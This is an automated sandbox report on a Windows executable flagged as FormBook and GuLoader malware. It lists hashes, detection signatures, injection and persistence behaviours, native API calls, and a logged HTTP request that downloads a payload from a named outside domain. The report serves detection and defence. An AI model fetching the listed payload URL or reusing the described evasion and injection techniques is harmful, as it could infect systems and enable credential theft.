Windows Analysis Report
SwiftCopy_23052024.exe

Overview

General Information

Sample name: SwiftCopy_23052024.exe
Analysis ID: 1446510
MD5: f8a9b82d69416512778ad72015181036
SHA1: 60013bbc382ad1722fc5be5f72188c57e7a4928d
SHA256: dabc79a064aa9838ad06d11311ff4c72913d9a7e7c1016cc9e12dcc46d474b8a
Tags: exesigned
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: innovativebuildingsolutions.in Virustotal: Detection: 13% Perma Link
Source: www.innovativebuildingsolutions.in Virustotal: Detection: 10% Perma Link
Source: https://www.innovativebuildingsolutions.in/ Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Virustotal: Detection: 27% Perma Link
Multi AV Scanner detection for submitted file
Source: SwiftCopy_23052024.exe ReversingLabs: Detection: 26%
Source: SwiftCopy_23052024.exe Virustotal: Detection: 27% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SwiftCopy_23052024.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: SwiftCopy_23052024.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 103.21.58.98:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: SwiftCopy_23052024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Tabsgivende.exe, Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbL source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb%B source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004062F0 FindFirstFileA,FindClose, 0_2_004062F0
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004057B5
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.innovativebuildingsolutions.inCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.innovativebuildingsolutions.inCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.innovativebuildingsolutions.in
Source: powershell.exe, 00000002.00000002.2194788863.0000000006D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft3m
Source: SwiftCopy_23052024.exe, SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.innovativebuildingsolutions.in/
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2374837467.0000000021E40000.00000004.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361654109.000000000664A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 103.21.58.98:443 -> 192.168.2.7:49706 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405252

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562C70 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_22562C70
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562DF0 NtQuerySystemInformation,LdrInitializeThunk, 18_2_22562DF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225635C0 NtCreateMutant,LdrInitializeThunk, 18_2_225635C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22564340 NtSetContextThread, 18_2_22564340
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22564650 NtSuspendThread, 18_2_22564650
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562AD0 NtReadFile, 18_2_22562AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562AF0 NtWriteFile, 18_2_22562AF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562AB0 NtWaitForSingleObject, 18_2_22562AB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562B60 NtClose, 18_2_22562B60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562BF0 NtAllocateVirtualMemory, 18_2_22562BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562BE0 NtQueryValueKey, 18_2_22562BE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562B80 NtQueryInformationFile, 18_2_22562B80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562BA0 NtEnumerateValueKey, 18_2_22562BA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562E30 NtWriteVirtualMemory, 18_2_22562E30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562EE0 NtQueueApcThread, 18_2_22562EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562E80 NtReadVirtualMemory, 18_2_22562E80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562EA0 NtAdjustPrivilegesToken, 18_2_22562EA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562F60 NtCreateProcessEx, 18_2_22562F60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562F30 NtCreateSection, 18_2_22562F30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562FE0 NtCreateFile, 18_2_22562FE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562F90 NtProtectVirtualMemory, 18_2_22562F90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562FB0 NtResumeThread, 18_2_22562FB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562FA0 NtQuerySection, 18_2_22562FA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562C60 NtCreateKey, 18_2_22562C60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562C00 NtQueryInformationProcess, 18_2_22562C00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562CC0 NtQueryVirtualMemory, 18_2_22562CC0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562CF0 NtOpenProcess, 18_2_22562CF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562CA0 NtQueryInformationToken, 18_2_22562CA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562D10 NtMapViewOfSection, 18_2_22562D10
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562D00 NtSetInformationFile, 18_2_22562D00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562D30 NtUnmapViewOfSection, 18_2_22562D30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562DD0 NtDelayExecution, 18_2_22562DD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562DB0 NtEnumerateKey, 18_2_22562DB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563010 NtOpenDirectoryObject, 18_2_22563010
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563090 NtSetValueKey, 18_2_22563090
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225639B0 NtGetContextThread, 18_2_225639B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563D70 NtOpenThread, 18_2_22563D70
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563D10 NtOpenProcessToken, 18_2_22563D10
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403248
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447F010 2_2_0447F010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447F8E0 2_2_0447F8E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447ECC8 2_2_0447ECC8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B02C0 18_2_225B02C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA352 18_2_225EA352
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E3F0 18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F03E6 18_2_225F03E6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B8158 18_2_225B8158
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520100 18_2_22520100
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E81CC 18_2_225E81CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F01AA 18_2_225F01AA
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254C6E0 18_2_2254C6E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554750 18_2_22554750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252C7C0 18_2_2252C7C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E2446 18_2_225E2446
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DE4F6 18_2_225DE4F6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F0591 18_2_225F0591
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EAB40 18_2_225EAB40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E6BD7 18_2_225E6BD7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253A840 18_2_2253A840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22532840 18_2_22532840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E8F0 18_2_2255E8F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225168B8 18_2_225168B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22546962 18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225FA9A6 18_2_225FA9A6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530E59 18_2_22530E59
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EEE26 18_2_225EEE26
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EEEDB 18_2_225EEEDB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542E90 18_2_22542E90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ECE93 18_2_225ECE93
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550F30 18_2_22550F30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22572F28 18_2_22572F28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522FC8 18_2_22522FC8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253CFE0 18_2_2253CFE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AEFA0 18_2_225AEFA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530C00 18_2_22530C00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520CF2 18_2_22520CF2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0CB5 18_2_225D0CB5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253AD00 18_2_2253AD00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252ADE0 18_2_2252ADE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22548DBF 18_2_22548DBF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254B2C0 18_2_2254B2C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D12ED 18_2_225D12ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225352A0 18_2_225352A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251D34C 18_2_2251D34C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E132D 18_2_225E132D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2257739A 18_2_2257739A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DF0CC 18_2_225DF0CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225370C0 18_2_225370C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E70E9 18_2_225E70E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EF0E0 18_2_225EF0E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251F172 18_2_2251F172
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225FB16B 18_2_225FB16B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256516C 18_2_2256516C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253B1B0 18_2_2253B1B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E16CC 18_2_225E16CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EF7B0 18_2_225EF7B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22521460 18_2_22521460
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EF43F 18_2_225EF43F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E7571 18_2_225E7571
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CD5B0 18_2_225CD5B0
